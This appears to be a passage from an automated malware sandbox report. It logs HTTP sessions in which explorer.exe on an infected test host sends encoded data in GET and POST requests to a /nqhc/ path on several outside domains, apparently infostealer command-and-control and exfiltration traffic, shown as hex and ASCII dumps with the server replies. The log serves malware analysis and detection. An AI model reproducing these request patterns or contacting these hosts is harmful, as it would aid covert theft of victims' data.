4d 28 59 42 46 49 37 50 66 6b 59 75 57 49 5a 36 4f 4a 73 69 31 66 62 33 72 4b 55 62 57 42 57 7e 58 6b 6a 77 69 6f 32 44 67 72 73 70 5f 72 32 69 54 7e 56 52 6e 41 37 6c 74 67 70 63 68 52 35 32 33 7a 38 56 66 35 53 66 43 41 47 4f 70 35 51 39 45 46 34 6d 67 32 4e 6d 41 30 31 6e 42 77 77 55 46 78 44 48 4b 35 66 55 63 51 48 41 62 33 2d 49 4e 78 62 4e 43 53 49 70 59 5a 46 6d 5f 57 36 35 55 4f 6e 53 54 55 6c 73 79 72 70 78 79 68 51 4c 4a 64 77 55 6f 41 35 6c 37 44 5f 59 57 6f 76 31 30 4e 77 5a 7a 65 4c 44 69 7a 4c 33 49 36 4c 53 6f 33 79 79 37 42 79 45 71 41 34 4b 53 4d 6a 4f 66 51 33 32 50 32 67 41 56 39 69 55 66 61 76 30 50 78 4b 63 6b 62 5a 76 51 50 53 58 52 38 44 4a 6e 30 5a 31
                                                                                                                                                                                    Data Ascii: r4txB=BmG0s2zn5Xfmhn4WnIG4JnAXz1w5DQ4ksrh2MC8HNSIUt71O1tRJylrEB_MAb5Al5eoWBKRzF02jH3ywJxeYoddi2axuplrSLyYtjy5tbhTD8e7Yx8ODG6N2Z87Nh7C_ct7Kd-WNV1rn3AQ9vebjW4KuFMR03X02jjGbEkTHCC8R16I2~q~xrTHHzyXxkTTNtsvsnKVwpWFpQDtVcCneDB8bfv3DdT8bHkx6qeN_YKvTkXj5UIMOeDEFpxa5oXsyzomnpIq9OO1A47uiqWTxm2RVlBT_Jo7PqCJ0IVmBV8p5wc5gyfF2hNPegaCWygYp2HUSjxPpfTwmtYNvn8UzgR3xrx0WZ2hwyOGF14EKwSBMPseGKP10BrExYhHfgcTNEwcGXXBc7nzLhbWyFHQD3e7kCclO(SAZk4G07t6uw_PNTI0uFm7M312mX0(BXmhIb0eYOUTFK0pw4QHtvAIhJD0joth32PsHT9yfTeTqxj2ki0MvKz8dhSARTWHa4zxGpHUX~23dIZFXYkgZHBIwL-9XV0o6PYl1dSXoIzVbZ5vuvpZaRdOnCgYBIIQ78TNgJlfEw4nDqBI3CAeot-qQeBf7rBBn9jV3CWaq2IxnNk(WdPK3G_rJXDGGNXA21iYpKhaLx-ZGMD8lFovoBJ(a7VlesWknfOq3yhcM3fz_SUPIRf9VnYeUyRKDECVue9E2l9OwbuFICW9NNXs_HkL-z3I2d2oS0bscz-RhmmjfrQhARIAGQdFoVvVqrLgIGJasu2ZJAIlV(llISpkTVHEWWgANi7fhTkLtAXv20refYPKGDlKk1NaFqCjpkpsKftlOlUo_BWL_KLMenO~WVafoJ17O9ur80sI_mzWEzzTCRCUhAN03qOg5rebKC5txwi6JFbejOTmLULKlHSPtzAjBepfE6Oov(T3WgBHG5tCMtH49QKjlf4aVR8LQfOEk7VvtoEcgQzjFpUJUL5Bv6guiEKLtUHBqVkcD30Zu5V8ojiyizqCV9_zaBWRhLTXSlpwB74P-pCUU1MDyR6FOyeLTFhzUpbLZbQi-aAAfWhBMCGVerz2Yj3RG(3QMb5k0UsXRVoP8rtQeSEFS27zwwUwDE6z6puAJnfIyVGr1a55D6M(YBFI7PfkYuWIZ6OJsi1fb3rKUbWBW~Xkjwio2Dgrsp_r2iT~VRnA7ltgpchR523z8Vf5SfCAGOp5Q9EF4mg2NmA01nBwwUFxDHK5fUcQHAb3-INxbNCSIpYZFm_W65UOnSTUlsyrpxyhQLJdwUoA5l7D_YWov10NwZzeLDizL3I6LSo3yy7ByEqA4KSMjOfQ32P2gAV9iUfav0PxKckbZvQPSXR8DJn0Z1_fX8mXhX5nCY559ZaIsJn7ce5(mbM5eJlVMSFQWqYIh1WSlmuUjit2bPaFoO_ncEoczRiGlNcVZ2DwFDm7IirRvgAPRaHRZuHrfd3hb8F5rYCYCckcKL8Ieezo22AHsUhYgWTy6x4(k47HFVnYI4CLE~y5tDY3PyNGGpvZzqZ32J9QzVPCIuOh4F2f3H3SQ62hIxQymbPyeWv0-qY4WNU5Ek64XUot7Ekxebjxfynp2JviHp2ZJk1c8soRufoD5QRxQB6Ec23UfdaH8L9gjAYr7TXdp35WcSFIOHnT35Y7bJ4mrO6AeK23Wm6xXIfTPeLPA76ZqNKc25eu4TnbS(u9uALKTEe2X4hco~oBrpvSqC6qdvsyDVbGNHe473EnDFXut4N7dL8pg8yXUcqdyoRSJDJ7CrdU5gqNk7vGd1awRaEFzxshbNDlYhzXaeDFq1Y7kg648eqvM58L1r1iK5x0fe3mZGrXUUqrqG1G7fxJjUQcVoTpaZMhb3pBB1yq1Dwzl(kg0sOeshIs1Pm0jHgGHPb7Ot579xxiT14FdOSmKq-(2bPoLfVHv4_~DLzo6hoUAB8xAAhGNzQxcGJxHKAcfoKPyL5pkUndp1ULZXc9FRAIXkLveHxws5f1sr-1A8DOLuFdAm2u1tfhuoXQNM6Bjcr2A4_pkkuXuwcA7wb5A8ohO6C~y6_0byEVXejiMs7BXP8T0U9~vA8wxXt1d6gpXiPnHwH0O1qg7ArlFNUzFyDCi1etthi(9VgUmJuIBSRSPjH(qTTV6BmtH9A3HE_yttbiY4tdzNt(HoQGLXxd1hZAh1h6frQdxjHEx~QhdfwPbl-6z9626OtyuY5q7Un5QgUjdcHb8LshBv3bl9fFO3QaqN8PN8o4okotA5sKw74BA0P(Pcw5zwwk2pZs2m1(GC-b_eB2McpWahOZo76eOxr06aNgLkvBIrZRpKV7ACFUSS73-pjOWZuvuHFa7paHGb-NMzNg9gWkNVMi9T9fdPD0qQQ7fnknc46lSNyqshBXWLZqIwNzbF3Vw0F(wJBR-Ef5C45LcoXPZ4XmtqjeG(OCQqfWzY1arjpxDbIRvwCZvz6agq1t09cD49BPPlBIhPTukeypxZIJx(NY55u60M2cDpzpPE6oQv1540b2Bgz32t1w9FMD792qsYtIIum(FkYh2cFcxtsV9cC3puWyuBmD1MIlnihTCS_3z6y1y8xBYiTnsek4kzgEjtHiwbRY6yrKWU2lwSKM3Lkk0BdG4sVdh4VQMxAOmHxF5Rd8RZtqIuQCH1YdMus~wIrRR(BbJWk0G4U1rMASIxuKj9MJt9AWTJ9vtOgiWhuS-0chk7k44I-kG7IPTd9Hze3g9eAglZl5oiaV_MC7giGwETETEEa0hgzpxclahmFZRrOo6F-L7Icowb9JuLw7w2wHL2OxTri~siHeRar5Sne6366BNFGV-gtzv2Gai3Lb4tWtj~J(Fhq24ysgjEMfByDNGe5Ph(rQzcmNv8gRAQbpFqpsrv6i0mgXLKESjcXxNvkxdl9lFQhJ5AvRPnQ0aqDYBHDR9ccJP7FxpdIRJq_ZpXDjI8tjwfQEHxrw9iD5FJkSztHwDFbvKllvHRpO4ACW7iEyvCvO3dl5ZMZuEJF9xSoq_vKr26ILKA88Ytzz0vxayJUjELhOvGqaY5ODKbM6R7-I1ZeqO3h6MVYvYYTF1IRw3(aZq6HVM6DGRmI1EPNVwwoIvUJzB1maX~a~CIbi3gF0hZEtgzPVSyQGRtRpH0fDCtCnqGYdkjFGUgRtohoEZMo67AWwqeaiBJUrd32ylos8ckQMSQ7AnZ5onkMdoFBrjjfSNEqzPJ6hfENSriqhfq_DQAvMsR03M6aoLIIHrOWoc(5SL8pzlymv-VSrxJ0TmwkkANy2xd1eYONnlpkfzMKVAV9hNmPwJzfjmlqM0Bm9fzAGoo7SxYCBAslBKVB73D5SkVdnTshbG8KLAU3I9iCIpHcZ2OCjHC4Dgb1EHCwbnKH~X3rkyx7kyoWDA9zsuie0yRnMY6y9MeoGaaF5c59~OWPUynsFama91RRRNK68ShFjRMvHvAu~h93WQyZpVLyNT7W~Z3hpQ8M5gGFK7NRIeuvuXhKz3ccBlFhHN(UPN5_EYzpGs3I59svdoQgDdDxZDe0JJgWq0~LgJ2_6NjWOeG1NXpE(Cp1AtHhcNTFX4KaGgZ8d5h_4letagomdcBUA9G-POqdVUQqDlytB1r-PmlbRzdRsUiri3Sq2Qyy9U1_tUnx1GMZR5yo38FFG3sLiEoBWpvrE9Q26kR6UumEsubx1f99ZzfPncifLRjLyArfy7(hOwPRwgDxMPuZ4OBuS257W67RnHGoBD2m8s930VWhM4mOpDD87f~HaJE7dlHLiWvFC3r1W_OVhpH3sRQipRd5xkXoJxHbZ2iRKINZilbddNIx0UARXLQFIReYDVmrB2KSq9IIJHdU4NvLhRC_9xd-q_lUFJPQIPC5eII9JTHBf30cv2EwQ0fE3xbWVojiYmXM0rKbR7etbLN4CLq_431txCSUjSTLdvXBIG0kX6khU-k1g1x8iWpQjx(DV_CSYMerKs(lXhxH~bN1xNwQg_kbaRUTr6TAEMIjEY4BMJyOJM(lrgD9XxpnhSp-c3J_NEn1CZVCZzURZCCh23U3WgL6d8NwKOFsQONbDzd8iH95DFUhyeuVO-uyfpXiN3VasmTz8TXO52
                                                                                                                                                                                    Nov 21, 2022 19:23:53.767724037 CET1642OUTData Raw: 65 4a 58 37 39 54 62 31 62 72 38 45 75 5a 56 71 4c 6a 31 63 68 33 7e 34 59 7a 4e 5a 69 51 63 49 50 39 63 78 49 31 65 7a 63 43 77 57 64 4d 31 79 75 53 74 54 47 30 78 59 32 55 44 41 79 6b 79 6c 34 43 7a 44 73 6b 79 6f 66 76 67 53 5a 54 72 6d 4e 6b
                                                                                                                                                                                    Data Ascii: eJX79Tb1br8EuZVqLj1ch3~4YzNZiQcIP9cxI1ezcCwWdM1yuStTG0xY2UDAykyl4CzDskyofvgSZTrmNk6AVmtpz_huGvMC7Kpr~zqmyH0ZJaBJX6bHExgBRquDxKdda_xfl_LEZRgR83QDXjzbEhnXjB4rAqmDTKdrL0oUQW4k81tfNqIh4DgBLW9ZX8Ei4PAokm0Iq-3exfcubUtJbsX66C8MjMFSa0NCViQflvvqTmK9zJy
                                                                                                                                                                                    Nov 21, 2022 19:23:53.767860889 CET1652OUTData Raw: 6e 61 48 76 57 68 54 39 61 39 49 6c 64 36 61 51 6c 6e 6b 5f 54 76 68 35 59 79 58 51 49 61 75 4a 79 4f 74 74 7a 30 6a 2d 58 63 7e 58 65 36 65 69 30 54 49 39 31 6c 38 64 37 7a 6b 75 53 62 39 6d 57 55 6d 63 34 62 39 36 49 52 51 65 4a 5f 49 76 4f 50
                                                                                                                                                                                    Data Ascii: naHvWhT9a9Ild6aQlnk_Tvh5YyXQIauJyOttz0j-Xc~Xe6ei0TI91l8d7zkuSb9mWUmc4b96IRQeJ_IvOP5bqZ(5n5rmRX~-yB3XXaBlnPjUndrhlp~RIOMCPLsgxfjK9SupgMqWNVhILcLG78CisZRb28qC99U9dSH_b5GLCyMqaHNfuOt0fR~kw9FzR1tAKosQXhNVU26x3zcqcrMTrjwckjehHwNdYIobTW1ViK~oOWwLStF
                                                                                                                                                                                    Nov 21, 2022 19:23:53.768074989 CET1663OUTData Raw: 38 55 70 79 57 52 30 6f 38 6e 64 42 6e 64 76 58 56 42 6c 38 64 79 63 49 72 31 46 73 58 71 36 77 72 38 69 6a 71 62 5a 68 46 2d 63 36 78 54 38 77 77 59 72 38 69 53 55 32 6b 52 74 63 63 2d 53 75 62 67 5a 71 4f 34 71 4d 39 66 7e 31 63 52 6d 71 73 69
                                                                                                                                                                                    Data Ascii: 8UpyWR0o8ndBndvXVBl8dycIr1FsXq6wr8ijqbZhF-c6xT8wwYr8iSU2kRtcc-SubgZqO4qM9f~1cRmqsizRnyxDmWj_Yxr2qtPxMIrEvbEAbngUlcIymqXiwopBdmDmMsGYafPqdvX-llqNJBHVyYEohPgqS1fRlvlBTXwOr2hSZpgkDd2h3NSaNzfLiFCEyCpGMeBNX48sfE3mhRC9OZb8(IjjIDYehBmhhqpidW3A5ACT~dm
                                                                                                                                                                                    Nov 21, 2022 19:23:53.768189907 CET1665OUTData Raw: 79 52 57 48 53 4b 4f 5a 45 57 62 41 33 35 65 59 59 78 74 76 44 65 30 64 58 37 46 76 7a 5a 51 46 70 6e 6e 77 75 4e 65 61 4b 31 79 64 35 35 4c 6e 70 58 76 41 42 6d 37 7a 74 49 43 4a 76 7a 4c 44 59 33 62 53 73 6d 37 72 4b 4c 34 77 71 2d 57 6d 4f 67
                                                                                                                                                                                    Data Ascii: yRWHSKOZEWbA35eYYxtvDe0dX7FvzZQFpnnwuNeaK1yd55LnpXvABm7ztICJvzLDY3bSsm7rKL4wq-WmOgQLUYDWHt(fLmLvQQ8rhSNp97bvMNH7R50G5rOm9eU2p76Ah0Ym0XAMs7a8v5huNhch(0Htv079nFFCv9oa4rR_VHOwOApz7WERf-F1Kk1OUUR1E1E_Eq9NnbxjfBNTz0kAA3NYWxQABgHsQkN4NbpDxqwMCc~LEYk
                                                                                                                                                                                    Nov 21, 2022 19:23:54.000361919 CET1673OUTData Raw: 4f 76 61 44 70 6d 53 78 4c 58 54 71 58 32 79 44 48 41 70 36 30 45 47 31 4b 7a 30 43 71 32 30 53 32 56 44 66 30 53 70 67 7a 56 7a 65 58 70 55 50 67 39 47 79 70 58 69 79 4d 6e 31 77 73 47 48 6a 62 41 73 4e 65 75 51 73 7a 4e 33 33 7a 79 59 51 45 36
                                                                                                                                                                                    Data Ascii: OvaDpmSxLXTqX2yDHAp60EG1Kz0Cq20S2VDf0SpgzVzeXpUPg9GypXiyMn1wsGHjbAsNeuQszN33zyYQE63dWy5aRC0TZ4cu1WJrbZHmHPFrtFJJT7C1El2O47bpeG0mxBeBDMgmvIwRw6tDQ5Q2xA7MnnA9OkpsUn3puzXfLdT3Q4L7yUgGVPEP3eUhU6WduozFPSUDGy(8dpHpzAegKYEXAH(WPvnNKx1x2ODNYxTP~A13hOq
                                                                                                                                                                                    Nov 21, 2022 19:23:54.000472069 CET1679OUTData Raw: 4b 6e 6c 51 4d 72 69 48 28 6b 65 4e 4b 67 34 34 6d 2d 45 64 55 6b 7a 62 35 7a 49 72 28 75 6c 33 47 50 7a 70 4e 4b 70 33 36 53 36 72 46 38 69 79 48 43 7a 68 28 41 58 73 71 38 36 74 53 6c 76 41 69 42 44 33 65 75 45 76 79 55 4e 34 6b 2d 74 54 31 4a
                                                                                                                                                                                    Data Ascii: KnlQMriH(keNKg44m-EdUkzb5zIr(ul3GPzpNKp36S6rF8iyHCzh(AXsq86tSlvAiBD3euEvyUN4k-tT1JczIy1dn1WwxLiu~w4kmj2nbFfxzchcESnCqmPX1pjXDph_SmF-7b(2XZyxJC08PkILXeEJY1NrxAAbsxUl4EsUKIdz615RO4usKt6iRQxYjuTewLl_xgNfNCtqBegUZzrHpyCOv5ytRIp4FDT-tA~OBXov9mcQ~Cn
                                                                                                                                                                                    Nov 21, 2022 19:23:54.314026117 CET1681INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:54 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0
                                                                                                                                                                                    Nov 21, 2022 19:23:54.543446064 CET1681INData Raw: 0a
                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    63192.168.11.2049889154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:55.781178951 CET1681OUTGET /nqhc/?r4txB=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.youlian.fund
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:23:56.014388084 CET1682INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:55 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1.0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    64192.168.11.2049890192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:01.133670092 CET1683OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.royaltechglobal.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 7a 47 33 66 35 68 71 30 38 6c 61 6d 77 54 76 44 61 52 38 75 68 76 6e 45 6f 57 6b 63 73 68 7e 34 67 78 35 64 39 38 46 54 59 35 68 79 65 75 33 75 78 2d 45 78 58 73 6e 69 4a 47 31 68 62 35 6f 35 74 58 44 6d 35 54 67 49 38 36 61 65 50 32 6f 6d 6f 73 68 5a 49 70 39 47 72 49 38 42 48 44 74 47 6c 68 47 71 70 34 51 65 4f 31 79 59 7a 68 6e 34 37 47 4f 49 44 50 59 4a 6b 37 34 31 68 69 6f 45 75 39 54 37 5a 4f 7a 53 31 7a 6d 39 47 79 66 31 4e 50 68 71 6b 6f 7a 70 47 4e 34 76 42 6a 33 72 4c 5f 33 4b 64 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=cCD7hmI-Mx(gzG3f5hq08lamwTvDaR8uhvnEoWkcsh~4gx5d98FTY5hyeu3ux-ExXsniJG1hb5o5tXDm5TgI86aeP2omoshZIp9GrI8BHDtGlhGqp4QeO1yYzhn47GOIDPYJk741hioEu9T7ZOzS1zm9Gyf1NPhqkozpGN4vBj3rL_3Kdw).
                                                                                                                                                                                    Nov 21, 2022 19:24:01.440999985 CET1684INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:01 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 13045
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                                    Data Ascii: rksg1\- "c+;OR&0`bto$_;Uwo"gzW^O}}? pwoIF9S/N`LzX`r}^O;h<!d$J`/osO'A38c\*HS',6 1-/uNg&kkZP&5H/qM_d(^#$1\;ETKw?5`tXnD&ZTk|+:J!v?~9w~I8?Ef>Wz,|9,^PrJ(M)iyUd'_d?=EA.5B8jB3M`[\df2$>n]e5ZF'iw(O`dhIy*\-gycs[L&[/peYP{(0 ;~;?y;W\$5M4N,Iq3/8}N qR/HTG68REn]^mfwS)/,-vwgHg&kkm4cab2a&%&I)r^$2NI\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441091061 CET1685INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f be d7 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                                    Data Ascii: PKTK?e%,{RXE~|'q)suBFD<uomZe~{:<MC5^dUQ,@f~h8LNx!,0ho!95oFTvb"t(@M]&.CS~s{a%IF.zy%W+6lcmre~=DV
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441180944 CET1687INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba df 44 48 6b e9 7e d0 03
                                                                                                                                                                                    Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$EDHk~oLo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441247940 CET1688INData Raw: 2c 70 7b 0c 52 1e 97 90 b6 2c ab 78 e3 20 e8 bb 69 af f6 40 59 f6 c8 2a 32 66 dc b0 40 96 62 59 cc 96 55 73 86 f6 28 8c 82 3f 0a a6 20 76 ad d3 d6 92 98 db e9 2c a7 71 cc 44 b2 f0 78 29 72 d3 6b 6f 5e 97 14 17 96 ab d6 0c 89 a6 c0 92 d4 94 10 1f
                                                                                                                                                                                    Data Ascii: ,p{R,x i@Y*2f@bYUs(? v,qDx)rko^iSD3(2,5=*E4gr&*P.a#Qc)Dq@b})99CD@{jTujCb6S=-9gHrzH`Auvu*B6BDB=t6vtM/8()
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441433907 CET1689INData Raw: d7 3e d9 90 72 82 29 5d af 79 64 53 6e 7b 93 14 14 ec 7b 4c a3 10 53 59 18 77 c4 e1 fa e0 26 a1 b9 1d a8 6b 73 42 19 4f c9 4a 86 9c 90 21 f1 28 67 89 e0 30 32 37 18 a1 68 61 7b 3e cb 50 4f 26 5c 26 38 c3 b5 6b 43 15 be 34 ef 84 41 c4 38 ca a3 e0
                                                                                                                                                                                    Data Ascii: >r)]ydSn{{LSYw&ksBOJ!(g027ha{>PO&\&8kC4A8%Hk4@P7ue#0<aY.bl~~$6"IWj]/.Xmf!];aI{dLNrrpr28ppl`+Z6p}3GN{~\f =R
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441529036 CET1691INData Raw: ca ca 1f 3e a2 87 17 9c 86 87 af 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 df d2 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d
                                                                                                                                                                                    Data Ascii: >Euu1^(ejKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD~i`Z3m0Xi?;T{F24~_PY<H@i{BSR.e/"rS^s)b0+Ja{?13_9HS->B%ic
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441591978 CET1692INData Raw: 5a ef 91 0c 62 46 07 7b 94 f3 3d e2 0f 77 fb 9c 89 2b 82 3b 19 ec 69 74 3a e8 14 c0 ec 11 16 0f f6 c6 13 37 a6 ea ca 0d b9 8c ae dc f2 d5 2d 21 52 05 a3 c1 5e 6a 4c de f3 7d 25 a7 94 1b 88 d2 84 cb 90 72 2f 92 99 3f c9 dd 48 0a 03 c2 f8 26 85 0c
                                                                                                                                                                                    Data Ascii: ZbF{=w+;it:7-!R^jL}%r/?H&_cTk02KX/@7=R%`"W;,w|CRm3/Y(J,z8Bp7&&?DG@*bwrTs9pvK)rk Jmd2x4
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441657066 CET1693INData Raw: e3 a3 ee e7 f7 b7 77 8c b8 9d e3 66 b7 ec d3 c6 8e ad 15 0e 4b 38 cf 36 e0 04 75 47 7f 8d 3a 73 c9 d0 34 40 98 68 0d 9c 0b 59 a8 08 be 57 34 4f 59 e4 10 99 83 a2 46 aa 81 c3 44 0d 53 8a 87 87 ca 32 d6 d6 c3 3e 7e 91 eb 8c 0b ec 97 1a 93 f7 7c 7f
                                                                                                                                                                                    Data Ascii: wfK86uG:s4@hYW4OYFDS2>~|2x'UM3<VC&,6iiX8QgD^Lqfs#rpPK^8#FGSgDA"jj23!*UbFlNmmi+;`
